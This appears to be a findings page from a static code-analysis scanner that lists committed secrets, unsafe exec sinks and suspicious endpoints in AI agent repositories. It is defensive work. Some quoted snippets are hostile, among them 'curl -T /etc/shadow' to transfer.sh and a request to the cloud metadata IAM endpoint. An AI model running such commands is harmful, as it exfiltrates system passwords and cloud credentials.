Code analysis
static source read inferred
Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.
50066 analyzed
8097 re-analysis due
988 not analyzable
0 not yet analyzed
4803 source gone
not analyzable
789 too large 199 no source
Running analyzer v33. The scanner changelog explains what each version detects and when it changed.
- hidden prompt 338
- committed secret 6178
- dynamic exec 11834
- obfuscation 3579
- suspicious endpoint 12346
- credential in log 713
- over-broad oauth scope 2550
- suspicious skill script 185
- bundled IDE extension 49
- skill file 187628
- HIGH committed secret dingdawg/dingdawg-agent-1 Anthropic key
sk-ant…(34 chars, redacted) - MEDIUM suspicious endpoint ahmeddoghri/mcpinterlock 169.254.169.254 (cloud metadata)
"arguments": {"url": "http://169.254.169.254/latest/meta-data/iam", "output": "/tmp/report.json"}, - MEDIUM suspicious endpoint averatec0773/beatos 2.2.2.2
.mockResolvedValueOnce("http://2.2.2.2:5000"), - MEDIUM suspicious endpoint averatec0773/beatos 1.1.1.1
.mockResolvedValueOnce("http://1.1.1.1:5000") - MEDIUM suspicious endpoint sipyourdrink-ltd/bernstein xyz.ngrok.io
sample = "some stderr garbage\n" + json.dumps({"url": "https://xyz.ngrok.io", "msg": "ok"}) - MEDIUM suspicious endpoint sipyourdrink-ltd/bernstein abc.ngrok.io
json.dumps({"lvl": "info", "msg": "started tunnel", "url": "https://abc.ngrok.io"}), - HIGH dynamic exec sipyourdrink-ltd/bernstein unsafe yaml.load()
config = yaml.load((REPO_ROOT / "mkdocs.yml").read_text(encoding="utf-8"), Loader=_MkDocsLoader) - HIGH committed secret sipyourdrink-ltd/bernstein Anthropic key
sk-ant…(57 chars, redacted) - HIGH committed secret sipyourdrink-ltd/bernstein GitHub token
ghp_A1…(40 chars, redacted) - HIGH committed secret sipyourdrink-ltd/bernstein private key
PEM private key block (redacted) - HIGH dynamic exec sipyourdrink-ltd/bernstein __import__ sink
"PATH": __import__("os").environ.get("PATH", ""), - MEDIUM suspicious endpoint sipyourdrink-ltd/bernstein transfer.sh
_EXFIL_OUTPUT = "curl -T /etc/shadow https://transfer.sh/dump" - HIGH committed secret sipyourdrink-ltd/bernstein AWS access key id
AKIAI4…(20 chars, redacted) - HIGH committed secret sipyourdrink-ltd/bernstein GitHub token
ghp_AA…(40 chars, redacted) - HIGH committed secret sipyourdrink-ltd/bernstein OpenAI key
sk-pro…(34 chars, redacted)